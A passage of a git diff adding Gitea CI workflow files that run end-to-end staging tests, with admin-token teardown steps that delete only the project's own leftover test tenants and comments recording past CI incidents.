NOT + # implement (see ci.yml upload step for the canonical error + # cite). Drop this pin when Gitea ships the v4 protocol. + uses: actions/upload-artifact@c6a366c94c3e0affe28c06c8df20a878f24da3cf # v3.2.2 + with: + name: playwright-report-staging + path: canvas/playwright-report-staging/ + retention-days: 14 + + - name: Upload screenshots on failure + if: failure() && needs.detect-changes.outputs.canvas == 'true' + # Pinned to v3 for Gitea act_runner v0.6 compatibility (see above). + uses: actions/upload-artifact@c6a366c94c3e0affe28c06c8df20a878f24da3cf # v3.2.2 + with: + name: playwright-screenshots + path: canvas/test-results/ + retention-days: 14 + + # Safety-net teardown — fires only when Playwright's globalTeardown + # didn't (worker crash, runner cancel). 
Reads the slug from + # canvas/.playwright-staging-state.json (written by staging-setup + # as its first action, before any CP call) and deletes only that + # slug. + # + # Earlier versions of this step pattern-swept `e2e-canvas--*` + # orgs to compensate for setup-crash-before-state-file-write. That + # over-aggressive cleanup raced concurrent canvas-E2E runs and + # poisoned each other's tenants — observed 2026-04-30 when three + # real-test runs killed each other mid-test, surfacing as + # `getaddrinfo ENOTFOUND` once CP had cleaned up the just-deleted + # DNS record. Pattern-sweep removed; setup now writes the state + # file before any CP work, so the slug is always recoverable. + - name: Teardown safety net + if: always() && needs.detect-changes.outputs.canvas == 'true' + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + STATE_FILE=".playwright-staging-state.json" + if [ ! -f "$STATE_FILE" ]; then + echo "::notice::No state file at canvas/$STATE_FILE — Playwright globalTeardown handled it (or setup never ran)." + exit 0 + fi + slug=$(python3 -c "import json; print(json.load(open('$STATE_FILE')).get('slug',''))") + if [ -z "$slug" ]; then + echo "::warning::State file present but slug missing; nothing to clean up." + exit 0 + fi + echo "Deleting orphan tenant: $slug" + # Verify HTTP 2xx instead of `>/dev/null || true` swallowing + # failures. A 5xx or timeout previously looked identical to + # success, leaving the tenant alive for up to ~45 min until + # sweep-stale-e2e-orgs caught it. Surface failures as + # workflow warnings naming the slug. Don't `exit 1` — a single + # cleanup miss shouldn't fail-flag the canvas test when the + # actual smoke check passed; the sweeper is the safety net. + # See molecule-controlplane#420. + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/canvas-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/canvas-cleanup.code + set -e + code=$(cat /tmp/canvas-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::canvas teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/canvas-cleanup.out 2>/dev/null)" + fi + exit 0 diff --git a/.gitea/workflows/e2e-staging-external.yml b/.gitea/workflows/e2e-staging-external.yml new file mode 100644 index 00000000..7479d8da --- /dev/null +++ b/.gitea/workflows/e2e-staging-external.yml @@ -0,0 +1,189 @@ +name: E2E Staging External Runtime + +# Ported from .github/workflows/e2e-staging-external.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). 
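+#
+# Note on the `github.event.inputs.*` references that survive further down in
+# this job's env block (keep_org, stale_wait_secs): with the dispatch inputs
+# dropped there is no inputs payload, the lookups come back empty, and the
+# `||` fallbacks win. A sketch of how those expressions resolve, assuming
+# Gitea evaluates them the way GitHub does:
+#
+#   ${{ github.event.inputs.keep_org && '1' || '0' }}    ->  '0'
+#   ${{ github.event.inputs.stale_wait_secs || '180' }}  ->  '180'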
+# + +# Regression for the four/five workspaces.status=awaiting_agent transitions +# that silently failed in production for five days before migration 046 +# extended the workspace_status enum (see +# workspace-server/migrations/046_workspace_status_awaiting_agent.up.sql). +# +# Why this is its own workflow (not folded into e2e-staging-saas.yml): +# - The full-saas harness defaults to runtime=hermes, never exercises +# external-runtime. Adding an `external` parameter to that script +# would force every push to staging through both lifecycles in +# series, doubling the EC2 cold-start budget. +# - The external lifecycle has unique timing (REMOTE_LIVENESS_STALE_AFTER +# window, 90s default + sweep interval), which we wait through +# deliberately. Folding it into hermes would make the long path +# even longer. +# - It can run in parallel with the hermes E2E since both create +# fresh tenant orgs with distinct slug prefixes (`e2e-ext-...` vs +# `e2e-...`). +# +# Triggers: +# - Push to staging when any source affecting external runtime, +# hibernation, or the migration set changes. +# - PR review for the same set. +# - Manual workflow_dispatch. +# - Daily cron at 07:30 UTC (catches drift on quiet days; staggered +# 30 min after e2e-staging-saas.yml's 07:00 UTC cron). +# +# Concurrency: serialized so two staging pushes don't fight for the +# same EC2 quota window. cancel-in-progress=false so a half-rolled +# tenant always finishes its teardown. + +on: + push: + branches: [main] + paths: + - 'workspace-server/internal/handlers/workspace.go' + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_restart.go' + - 'workspace-server/internal/registry/healthsweep.go' + - 'workspace-server/internal/registry/liveness.go' + - 'workspace-server/migrations/**' + - 'workspace-server/internal/db/workspace_status_enum_drift_test.go' + - 'tests/e2e/test_staging_external_runtime.sh' + - '.gitea/workflows/e2e-staging-external.yml' + pull_request: + branches: [main] + paths: + - 'workspace-server/internal/handlers/workspace.go' + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_restart.go' + - 'workspace-server/internal/registry/healthsweep.go' + - 'workspace-server/internal/registry/liveness.go' + - 'workspace-server/migrations/**' + - 'workspace-server/internal/db/workspace_status_enum_drift_test.go' + - 'tests/e2e/test_staging_external_runtime.sh' + - '.gitea/workflows/e2e-staging-external.yml' + schedule: + - cron: '30 7 * * *' + +concurrency: + group: e2e-staging-external + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + e2e-staging-external: + name: E2E Staging External Runtime + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 25 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + E2E_RUN_ID: "${{ github.run_id }}-${{ github.run_attempt }}" + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org && '1' || '0' }} + E2E_STALE_WAIT_SECS: ${{ github.event.inputs.stale_wait_secs || '180' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + # Schedule + push triggers must hard-fail when the token is + # missing — silent skip would mask infra rot. 
Manual dispatch + # gets the same hard-fail; an operator running this on a fork + # without secrets configured needs to know up-front. + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN secret not set (Railway staging CP_ADMIN_API_TOKEN)" + exit 2 + fi + echo "Admin token present ✓" + + - name: CP staging health preflight + run: | + code=$(curl -sS -o /dev/null -w "%{http_code}" --max-time 10 "$MOLECULE_CP_URL/health") + if [ "$code" != "200" ]; then + echo "::error::Staging CP unhealthy (got HTTP $code). Skipping — not a workspace bug." + exit 1 + fi + echo "Staging CP healthy ✓" + + - name: Run external-runtime E2E + id: e2e + run: bash tests/e2e/test_staging_external_runtime.sh + + # Mirror the e2e-staging-saas.yml safety net: if the runner is + # cancelled (e.g. concurrent staging push), the test script's + # EXIT trap may not fire, so we sweep e2e-ext-* slugs scoped to + # *this* run id. + - name: Teardown safety net (runs on cancel/failure) + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # Scope STRICTLY to this run id (e2e-ext-YYYYMMDD--...) + # so concurrent runs and unrelated dev probes are not touched. + # Sweep today AND yesterday so a midnight-crossing run still + # cleans up its own slug. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if not run_id: + # Without a run id we cannot scope safely; bail rather + # than risk deleting unrelated tenants. + sys.exit(0) + prefixes = tuple(f'e2e-ext-{d}-{run_id}-' for d in dates) + for o in d.get('orgs', []): + s = o.get('slug', '') + if s.startswith(prefixes) and o.get('status') != 'purged': + print(s) + " 2>/dev/null) + if [ -n "$orgs" ]; then + echo "Safety-net sweep: deleting leftover orgs:" + echo "$orgs" + # Per-slug verified DELETE — see molecule-controlplane#420. + # `>/dev/null 2>&1` previously hid every failure; surface + # non-2xx as workflow warnings so the run page names what + # leaked. Sweeper catches the rest within ~45 min. + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/external-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/external-cleanup.code + set -e + code=$(cat /tmp/external-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::external teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/external-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::external teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + else + echo "Safety-net sweep: no leftover orgs to clean." 
+ fi diff --git a/.gitea/workflows/e2e-staging-saas.yml b/.gitea/workflows/e2e-staging-saas.yml new file mode 100644 index 00000000..f0e501f6 --- /dev/null +++ b/.gitea/workflows/e2e-staging-saas.yml @@ -0,0 +1,251 @@ +name: E2E Staging SaaS (full lifecycle) + +# Ported from .github/workflows/e2e-staging-saas.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Dedicated workflow that provisions a fresh staging org per run, exercises +# the full workspace lifecycle (register → heartbeat → A2A → delegation → +# HMA memory → activity → peers), then tears down and asserts leak-free. +# +# Why a separate workflow (not folded into ci.yml): +# - The run takes ~25-35 min (EC2 boot + cloudflared DNS + provision sweeps + +# agent bootstrap), way too slow for every PR. +# - Needs its own concurrency group so two pushes don't fight over the +# same staging org slug prefix. +# - Has its own required secrets (session cookie, admin token) that most +# PRs don't need to read. +# +# Triggers: +# - Push to main (regression guard) +# - workflow_dispatch (manual re-run from UI) +# - Nightly cron (catches drift even when no pushes land) +# - Changes to any provisioning-critical file under PR review (opt-in +# via the same paths watcher that e2e-api.yml uses) + +on: + # Trunk-based (Phase 3 of internal#81): main is the only branch. + # Previously this fired on staging push too because staging was a + # superset of main and ran the gate ahead of auto-promote; with no + # staging branch, main is where E2E gates the deploy. + push: + branches: [main] + paths: + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_provision.go' + - 'workspace-server/internal/handlers/a2a_proxy.go' + - 'workspace-server/internal/middleware/**' + - 'workspace-server/internal/provisioner/**' + - 'tests/e2e/test_staging_full_saas.sh' + - '.gitea/workflows/e2e-staging-saas.yml' + pull_request: + branches: [main] + paths: + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_provision.go' + - 'workspace-server/internal/handlers/a2a_proxy.go' + - 'workspace-server/internal/middleware/**' + - 'workspace-server/internal/provisioner/**' + - 'tests/e2e/test_staging_full_saas.sh' + - '.gitea/workflows/e2e-staging-saas.yml' + schedule: + # 07:00 UTC every day — catches AMI drift, WorkOS cert rotation, + # Cloudflare API regressions, etc. even on quiet days. + - cron: '0 7 * * *' + +# Serialize: staging has a finite per-hour org creation quota. Two pushes +# landing in quick succession should queue, not race. `cancel-in-progress: +# false` mirrors e2e-api.yml — GitHub would otherwise cancel the running +# teardown step and leave orphan EC2s. +concurrency: + group: e2e-staging-saas + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + e2e-staging-saas: + name: E2E Staging SaaS + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. 
+ continue-on-error: true + timeout-minutes: 45 + permissions: + contents: read + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + # Single admin-bearer secret drives provision + tenant-token + # retrieval + teardown. Configure in + # Settings → Secrets and variables → Actions → Repository secrets. + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + # MiniMax is the PRIMARY LLM auth path post-2026-05-04. Switched + # from hermes+OpenAI default after #2578 (the staging OpenAI key + # account went over quota and stayed dead for 36+ hours, taking + # the full-lifecycle E2E red on every provisioning-critical push). + # claude-code template's `minimax` provider routes + # ANTHROPIC_BASE_URL to api.minimax.io/anthropic and reads + # MINIMAX_API_KEY at boot — separate billing account so an + # OpenAI quota collapse no longer wedges the gate. Mirrors the + # canary-staging.yml + continuous-synth-e2e.yml migrations. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. + E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so an operator-dispatched run with + # E2E_RUNTIME=hermes or =langgraph via workflow_dispatch can still + # exercise the OpenAI path. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + E2E_RUNTIME: ${{ github.event.inputs.runtime || 'claude-code' }} + # Pin the model when running on the default claude-code path — + # the per-runtime default ("sonnet") routes to direct Anthropic + # and defeats the cost saving. Operators can override via the + # workflow_dispatch flow (no input wired here yet — runtime + # override is enough for ad-hoc). + E2E_MODEL_SLUG: ${{ github.event.inputs.runtime == 'hermes' && 'openai/gpt-4o' || github.event.inputs.runtime == 'langgraph' && 'openai:gpt-4o' || 'MiniMax-M2.7-highspeed' }} + E2E_RUN_ID: "${{ github.run_id }}-${{ github.run_attempt }}" + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org && '1' || '0' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN secret not set (Railway staging CP_ADMIN_API_TOKEN)" + exit 2 + fi + echo "Admin token present ✓" + + - name: Verify LLM key present + run: | + # Per-runtime key check — claude-code uses MiniMax; hermes / + # langgraph (operator-dispatched only) use OpenAI. Hard-fail + # rather than soft-skip per #2578's lesson — empty key + # silently falls through to the wrong SECRETS_JSON branch and + # produces a confusing auth error 5 min later instead of the + # clean "secret missing" message at the top. + case "${E2E_RUNTIME}" in + claude-code) + # Either MiniMax OR direct-Anthropic works — first + # non-empty wins in the test script's secrets-injection + # priority chain. 
+ if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret not set for runtime=${E2E_RUNTIME} — workspaces will fail at boot with 'No provider API key found'" + exit 2 + fi + echo "LLM key present ✓ (runtime=${E2E_RUNTIME}, key=${required_secret_name}, len=${#required_secret_value})" + + - name: CP staging health preflight + run: | + code=$(curl -sS -o /dev/null -w "%{http_code}" --max-time 10 "$MOLECULE_CP_URL/health") + if [ "$code" != "200" ]; then + echo "::error::Staging CP unhealthy (got HTTP $code). Skipping — not a workspace bug." + exit 1 + fi + echo "Staging CP healthy ✓" + + - name: Run full-lifecycle E2E + id: e2e + run: bash tests/e2e/test_staging_full_saas.sh + + # Belt-and-braces teardown: the test script itself installs a trap + # for EXIT/INT/TERM, but if the GH runner itself is cancelled (e.g. + # someone pushes a new commit and workflow concurrency is set to + # cancel), the trap may not fire. This `always()` step runs even on + # cancellation and attempts the delete a second time. The admin + # DELETE endpoint is idempotent so double-invoking is safe. + - name: Teardown safety net (runs on cancel/failure) + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + # Best-effort: find any e2e-YYYYMMDD-* orgs matching this run and + # nuke them. Catches the case where the script died before + # exporting its slug. + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # ONLY sweep slugs from *this* CI run. Previously the filter was + # f'e2e-{today}-' which stomped on parallel CI runs AND any manual + # E2E probes a dev was running against staging (incident 2026-04-21 + # 15:02Z: this workflow's safety net deleted an unrelated manual + # run's tenant 1s after it hit 'running'). + # Sweep both today AND yesterday's UTC dates so a run that crosses + # midnight still matches its own slug — see the 2026-04-26→27 + # canvas-safety-net incident for the same bug class. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if run_id: + prefixes = tuple(f'e2e-{d}-{run_id}-' for d in dates) + else: + prefixes = tuple(f'e2e-{d}-' for d in dates) + candidates = [o['slug'] for o in d.get('orgs', []) + if any(o.get('slug','').startswith(p) for p in prefixes) + and o.get('instance_status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + # Per-slug verified DELETE (was `>/dev/null || true` — see + # molecule-controlplane#420). 
Surface non-2xx as a workflow + # warning naming the leaked slug; don't exit 1 (sweeper is + # the safety net within ~45 min). + leaks=() + for slug in $orgs; do + echo "Safety-net teardown: $slug" + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/saas-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/saas-cleanup.code + set -e + code=$(cat /tmp/saas-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::saas teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/saas-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::saas teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/e2e-staging-sanity.yml b/.gitea/workflows/e2e-staging-sanity.yml new file mode 100644 index 00000000..032924cd --- /dev/null +++ b/.gitea/workflows/e2e-staging-sanity.yml @@ -0,0 +1,157 @@ +name: E2E Staging Sanity (leak-detection self-check) + +# Ported from .github/workflows/e2e-staging-sanity.yml on 2026-05-11 per +# RFC internal#219 §1 sweep. +# +# Differences from the GitHub version: +# - Dropped `workflow_dispatch:` (Gitea 1.22.6 finicky on bare dispatch). +# - `actions/github-script@v9` issue-open block replaced with curl +# calls to the Gitea REST API (/api/v1/repos/.../issues|comments). +# - Workflow-level env.GITHUB_SERVER_URL set. +# - `continue-on-error: true` on the job (RFC §1 contract). +# +# Periodic assertion that the teardown safety nets in e2e-staging-saas +# and canary-staging actually work. Runs the E2E harness with +# E2E_INTENTIONAL_FAILURE=1, which poisons the tenant admin token after +# the org is provisioned. The workspace-provision step then fails, the +# script exits non-zero, and the EXIT trap + workflow always()-step +# must still tear down cleanly. + +on: + schedule: + - cron: '0 6 * * 1' + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +concurrency: + group: e2e-staging-sanity + cancel-in-progress: false + +permissions: + issues: write + contents: read + +jobs: + sanity: + name: Intentional-failure teardown sanity + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 20 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + E2E_MODE: canary + E2E_RUNTIME: hermes + E2E_RUN_ID: "sanity-${{ github.run_id }}" + E2E_INTENTIONAL_FAILURE: "1" + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set" + exit 2 + fi + + # Inverted assertion: the run MUST fail. If it passes, the + # E2E_INTENTIONAL_FAILURE path is broken. + - name: Run harness — expecting exit !=0 + id: harness + run: | + set +e + bash tests/e2e/test_staging_full_saas.sh + rc=$? 
+ echo "harness_rc=$rc" >> "$GITHUB_OUTPUT" + if [ "$rc" = "1" ]; then + echo "OK Harness failed as expected (rc=1); teardown trap ran, leak-check passed" + exit 0 + elif [ "$rc" = "0" ]; then + echo "::error::Harness succeeded under E2E_INTENTIONAL_FAILURE=1 — the poisoning path is broken" + exit 1 + elif [ "$rc" = "4" ]; then + echo "::error::LEAK DETECTED (rc=4) — teardown failed to clean up the org. Safety net broken." + exit 4 + else + echo "::error::Unexpected rc=$rc — neither clean-failure nor leak. Investigate harness." + exit 1 + fi + + - name: Open issue if safety net is broken (Gitea API) + if: failure() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="E2E teardown safety net broken" + RUN_URL="${SERVER_URL}/${REPO}/actions/runs/${RUN_ID}" + + BODY_JSON=$(jq -nc --arg t "$TITLE" --arg run "$RUN_URL" ' + {title: $t, + body: ("The weekly sanity run (E2E_INTENTIONAL_FAILURE=1) did not exit as expected. This means one of:\n - poisoning did not actually cause failure (test harness regression), OR\n - teardown left an orphan org (leak detection caught a real bug)\n\nRun: " + $run + "\n\nThis is higher priority than a canary failure — the whole E2E safety net cannot be trusted until this is resolved.")}') + + EXISTING=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number' | head -1) + + if [ -n "$EXISTING" ]; then + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${EXISTING}/comments" \ + -d "$(jq -nc --arg run "$RUN_URL" '{body: ("Still broken. " + $run)}')" >/dev/null + echo "Commented on existing issue #${EXISTING}" + else + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues" -d "$BODY_JSON" >/dev/null + echo "Filed new issue" + fi + + # Belt-and-braces: if teardown left anything behind, nuke it here + # so we don't bleed staging quota. + - name: Teardown safety net + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys + d = json.load(sys.stdin) + today = __import__('datetime').date.today().strftime('%Y%m%d') + candidates = [o['slug'] for o in d.get('orgs', []) + if o.get('slug','').startswith(f'e2e-canary-{today}-sanity-') + and o.get('status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/sanity-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/sanity-cleanup.code + set -e + code=$(cat /tmp/sanity-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::sanity teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. 
Body: $(head -c 300 /tmp/sanity-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::sanity teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/handlers-postgres-integration.yml b/.gitea/workflows/handlers-postgres-integration.yml new file mode 100644 index 00000000..97eb261b --- /dev/null +++ b/.gitea/workflows/handlers-postgres-integration.yml @@ -0,0 +1,282 @@ +name: Handlers Postgres Integration + +# Ported from .github/workflows/handlers-postgres-integration.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Real-Postgres integration tests for workspace-server/internal/handlers/. +# Triggered on every PR/push that touches the handlers package. +# +# Why this workflow exists +# ------------------------ +# Strict-sqlmock unit tests pin which SQL statements fire — they're fast +# and let us iterate without a DB. But sqlmock CANNOT detect bugs that +# depend on the row state AFTER the SQL runs. The result_preview-lost +# bug shipped to staging in PR #2854 because every unit test was +# satisfied with "an UPDATE statement fired" — none verified the row's +# preview field actually landed. The local-postgres E2E that retrofit +# self-review caught it took 2 minutes to set up and would have caught +# the bug at PR-time. +# +# Why this workflow does NOT use `services: postgres:` (Class B fix) +# ------------------------------------------------------------------ +# Our act_runner config has `container.network: host` (operator host +# /opt/molecule/runners/config.yaml), which act_runner applies to BOTH +# the job container AND every service container. With host-net, two +# concurrent runs of this workflow both try to bind 0.0.0.0:5432 — the +# second postgres FATALs with `could not create any TCP/IP sockets: +# Address in use`, and Docker auto-removes it (act_runner sets +# AutoRemove:true on service containers). By the time the migrations +# step runs `psql`, the postgres container is gone, hence +# `Connection refused` then `failed to remove container: No such +# container` at cleanup time. +# +# Per-job `container.network` override is silently ignored by +# act_runner — `--network and --net in the options will be ignored.` +# appears in the runner log. Documented constraint. +# +# So we sidestep `services:` entirely. The job container still uses +# host-net (inherited from runner config; required for cache server +# discovery on the bridge IP 172.18.0.17:42631). We launch a sibling +# postgres on the existing `molecule-core-net` bridge with a +# UNIQUE name per run — `pg-handlers-${RUN_ID}-${RUN_ATTEMPT}` — and +# read its bridge IP via `docker inspect`. A host-net job container +# can reach a bridge-net container directly via the bridge IP (verified +# manually on operator host 2026-05-08). +# +# Trade-offs vs. 
